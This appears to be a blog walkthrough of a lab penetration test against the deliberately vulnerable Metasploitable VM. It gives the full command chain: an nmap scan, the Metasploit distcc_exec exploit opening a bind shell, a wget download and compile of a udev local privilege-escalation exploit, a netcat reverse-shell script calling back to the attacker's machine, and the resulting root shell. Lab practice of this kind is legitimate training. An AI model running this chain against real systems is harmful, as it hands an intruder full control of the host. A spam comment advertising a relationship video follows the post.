# Metasploitable (distccd + udev)

Introducción

Metasploitable virtual machine (01, 02, 03, 04)
udev < 141 Local Privilege Escalation Exploit

Ejecución
# msfconsole
msf > nmap -sV -O -p 1-65535 192.168.1.50
[*] exec: nmap -sV -O -p 1-65535 192.168.1.50

Not shown: 65523 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  netbios-ssn 
3306/tcp open  mysql
3632/tcp open  distccd
5432/tcp open  postgresql
8009/tcp open  ajp13
8180/tcp open  http
MAC Address: 08:00:27:F7:38:97 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.28
Network Distance: 1 hop
Service Info: Host:  metasploitable.localdomain; OSs: Unix, Linux

msf > search distccd
msf > use unix/misc/distcc_exec
msf exploit(distcc_exec) > show options
msf exploit(distcc_exec) > set rhost 192.168.1.50
msf exploit(distcc_exec) > show payloads
msf exploit(distcc_exec) > set payload cmd/unix/bind_ruby
# nc -vl 1234
msf exploit(distcc_exec) > exploit

[*] Started bind handler
[*] Command shell session 1 opened (192.168.1.100:56362 -> 192.168.1.50:4444)

uname -a
Linux metasploitable 2.6.24-16-server
whoami
daemon
wget http://www.exploit-db.com/download/8572
mv index.html cve-2009-1185.c
gcc -o cve-2009-1185 cve-2009-1185.c
echo "#!/bin/sh\n/bin/netcat -e /bin/sh 192.168.1.100 1234" > /tmp/run
ps axuf | grep udev | grep -v grep
root      2479  0.0  0.0   2104   708 ?        Ss  05:32   0:00 /sbin/udevd --daemon
./cve-2009-1185 2478 # =2479-1
# nc -vl 1234
Connection from 192.168.1.50 port 1234 [tcp/*] accepted
uname -a
Linux metasploitable 2.6.24-16-server
whoami
root

1 comment:

Blogger said...

If you need your ex-girlfriend or ex-boyfriend to come crawling back to you on their knees (no matter why you broke up) you got to watch this video
right away...

(VIDEO) Why your ex will NEVER get back...